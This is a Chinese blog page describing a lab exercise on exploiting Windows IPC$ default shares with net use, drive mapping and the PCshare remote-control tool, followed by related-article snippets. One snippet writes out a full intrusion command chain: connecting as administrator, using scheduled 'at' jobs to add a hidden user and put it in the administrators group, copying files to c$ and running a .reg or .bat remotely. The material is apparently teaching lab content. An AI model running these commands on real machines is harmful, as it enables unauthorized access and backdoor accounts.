信息安全 漏洞利用

最新推荐文章于 2024-10-18 00:45:00 发布
原创 最新推荐文章于 2024-10-18 00:45:00 发布 · 672 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

该实验详细介绍了如何利用IPC$漏洞进行远程控制。首先,确认目标IPC$共享打开,然后通过net use命令建立连接,映射目标C盘为本地Z盘。接着,使用PCshare工具生成并上传远程控制程序,尝试获取远程主机的Shell、用户列表等信息。最后,从远程主机角度探讨防御策略,尽管未能按预定时间上线,但整个过程展示了IPC$漏洞的利用流程。

实验目的

1、了解IPC$漏洞原理

2、掌握几个相关net 命令的用法

3、掌握PCshare生成远程控制程序工具的使用

  • 实验原理

实验参考步骤:

1、确认目标的IPC$默认共享已经打开。

2、在本地利用net use与远程目标建立IPC$连接通道、

3、将目标的C盘映射为本地Z盘。

(至此,说明已成功入侵并控制对方C盘,继续进行可更方便地实现全方位的远程控制)

4、利用PCshare工具实现远程控制。

5、尝试获得远程主机的 Shell、用户列表、开启的服务列表、开放的端口列表等

6、站在远程主机角度,尝试进行防御,破坏远程控制。

一. 建立非空连接

最低0.47元/天 解锁文章
实验记录一之SQL注入
qq_54580973的博客
05-07 382
这只是我一次实验过程的记录!!!! DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 安装部署phpStudy+DVWA漏洞演练平台 安装phpstudy,安装完成后启动phpStudy主界面,当看到 Apache 和 MySQL 文字后面红色的圆点变成绿色时,表示服务启动成
ipc$漏洞利用实例
dieman0446的博客
07-26 1502
一、什么是IPC$ IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道, 通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换, 从而实现对远程计算机的访问。 二、如何发现系统是否存在该漏洞 本例中所讲的IPC$漏洞缘起弱口令漏洞,使用一些弱口令扫描工具即可发现I...
2002-2006年系统经典利用漏洞ipc$
01-22
2002-2006年系统经典利用漏洞ipc$ 2. 实例演示-完整入侵过程 (1)纯DOS命令式 入侵 首先构建一个入侵的环境,虚拟机之间能相互通信,即可表示为互联网环境,再扫描,得到有 漏洞的计算机IP net use \\192.168.38.129 /u:administrator ------------连接扫描到有漏洞大远程计算机(扫描远程电脑无密码)如果有密码 net use \\192.168.38.129 “” /u:administrator--- “”中要输入远程电脑的密码。 net use --------查看是否成功连接 net time \\192.168.38.129 ----查看对方电脑时间 at \\192.168.38.129 09:05 net user hnqdwxf2003 123 /add ---用at命令建立一个用户hnqdwxf2003密码123 at \\192.168.38.129 net localgroup administrators hnqdwxf2003 /add --提升为管理员权限 copy 拖进来\\192.168.38.129\c$ net time \\192.168.38.129 ----再次查看对方电脑时间 at \\192.168.38.129 时间 regedit /s c:\1.reg 或将对方电脑共享盘映射到本机 net use p:\\192.168.38.129 \c$ at \\192.168.38.129 时间 c:\1.bat 等待对方电脑重启,再连连接3389。 (2)利用开启telnet工具 (3)利用远控工具
IPC$漏洞利用简介
YUKIDDDD的博客
08-02 4068
IPC$漏洞利用简介1.关于Windows操作系统中的“共享”2. 利用条件3.IPC连接建立与攻击尝试5.常用命令 1.关于Windows操作系统中的“共享” 在Windows操作系统中的共享有3类:普通共享、默认共享、IPC$共享, 普通共享:就是通常意义上的共享,即用户设置的共享目录、共享文件夹、共享分区等; 默认共享:Windows操作系统的隐含驱动器共享,通常有: (1)驱动器共享:如C$、D$,开启后可直接访问分区中资源; (2)系统管理共享admin$:通常指向C:\Windows。
ipc$漏洞攻击(实验)
2301_76361674的博客
05-10 3151
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。5.然后,我们物理连接到靶机上,到了两分钟后,我们可以用命令看到,这个pp45的用户就出现了。
信息安全技术 安全漏洞等级划分指南》.doc
03-24
信息安全技术 安全漏洞等级划分指南 《信息安全技术 安全漏洞等级划分指南》是中华人民共和国国家标准GB/T XXXXX—XXXX,发布于XXXX年XX月XX日,实施于XXXX年XX月XX日。该标准旨在提供一份统一的安全漏洞等级划分...
网络安全漏洞利用脚本全解析:原理、常见类型及防御策略
最新发布
05-09
随后,文章剖析了漏洞利用脚本的工作机制,包括信息收集、漏洞探测和漏洞利用三个阶段。结合实际案例,如某知名网站的SQL注入攻击和MySpace的XSS蠕虫传播事件,进一步强调了漏洞利用脚本攻击的危害。最后,提出了...
精选资源
信息安全技术:MySQL数据库漏洞利用.doc
11-01
信息安全技术基础
「 网络安全常用术语解读 」漏洞利用交换VEX详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
04-17 2779
VEX(Vulnerability Exploitability eXchange),即漏洞利用性交换,是一个软件生产者与软件消费者共享其软件组件中存在的漏洞评估的系统。VEX提供了一种一致且标准化的方式来描述漏洞,包括漏洞的标准详细信息,如严重性、影响软件。还包括对漏洞的分析,例如漏洞是否可被利用,以及如何减轻或修复漏洞,以及可用于防范的任何已知解决方案。VEX是软件生产商对其软件中的漏洞进行分类和标记的机制。VEX标准是由开放式标准组织OASIS。
信息安全工程师(55)网络安全漏洞概述
m0_73399576的博客
10-18 1934
信息安全工程师——网络安全漏洞概述篇
Ipc漏洞简单攻击.
03-14
Ipc漏洞简单攻击.这是网络工具中很好的一个哦
漏洞利用原理(高级)
wk19951125的博客
08-16 431
Windows安全机制概述参考文献 windows提供的浅层安全机制: 增加Windows安全中心 添加PC段防火墙 未经用户允许,大多数Web弹窗和Activex控件安装均被禁止 Internet Explorer 7增加了筛选防冒网站功能 添加UAC(用户账户控制)机制 集成Windows Defender Windows提供的深层保护: 使用GS编译技术,在函数返回地址之前加入Secu...
基于 Win Server 2008 复现 IPC$ 漏洞
Welcome To My6n Blog
03-07 2349
所有的这些初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者会利用 IPC$ ,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测。为了配合IPC共享工作,Windows操作系统(不包括Windows 98系列)在安装完成后,自动设置共享的目录为:C盘、D盘、E盘、ADMIN目录(C:\Windows)等,即为 ADMIN$、C$、D$、E$ 等,但要注意,这些共享是隐藏的,只有管理员能够对他们进行远程操作。(相当于是限定我们的渗透方向)。
(实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制
F4ckM3的专栏
08-18 4077
实验简介 实验所属系列:网络攻击与对抗实验对象:本科/专科信息安全专业相关课程及专业:信息网络安全概论、计算机网络实验时数(学分):2学时实验类别:实践实验类 实验目的   1.了解IPC$漏洞原理;   2.掌握IPC$漏洞攻击方法;   3.掌握psExec工具的使用;   4.掌握远程控制工具radmin的使用。 预备知识 本实验要求实验者具备如下的相关知识。     
从编程角度来看IPC$空连接的利用和防范
修养生息,以得佳境
04-22 2823
  前言  我们知道,一般的攻击行为的首要步骤是收集目标的系统信息,对于NT/2K/XP系统而言,最简单的收集方法就是利用IPC$空连接。本文从原理入手介绍IPC$,并从编程的角度来看如何利用它,最后介绍一些简单的防范。本文要求读者有一定编程和C的基础,对网络知识有所了解。 我会收集一些常用的IPC$
基于 Win Server 2008 复现 IPC$ 漏洞,一个小例子彻底搞懂网络安全的MVP模式到底是什么
2401_84139728的博客
04-06 910
因为这个 win server 2008 是我的一台靶场机,所以会扫到这么多的漏洞由于登录用户密码是我自定义修改过的,所以这里我们并没有扫到弱口令正常来说,win server 2003 会扫到弱口令:administrator/123456接下来我们分别演示利用 IPC$ 建立空连接和非空连接我们可以无需用户名与密码与目标主机建立一个空的连接(前提是对方机器必须开了 IPC$ 共享),利用这个空的连接,我们可以得到目标主机上的用户列表。
2021-10-28 漏洞利用与远程控制
夕阳的街道的博客
10-28 890
一、实验题目: 漏洞利用与远程控制 二、实验内容: 1.使用nmap的【-A】参数对metasploitable进行强力扫描 2.使用kali自带的msfconsole进行渗透测试与远程控制 三、环境准备: 1.kali虚拟机(攻击者主机:192.168.112.130) 2.Metasploitable靶机(目标主机:192.168.112.132) 四、实验步骤: 1.使用pin...
使用Metasploit进行ms12-020蓝屏攻击
A_dmin的博客
09-12 2873
使用Metasploit进行ms12-020蓝屏攻击 实验概述   Ms12-020是Microsoft远程桌面协议RDP远程代码执行漏洞,本实验是通过利用meterpreter进行攻击。   远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值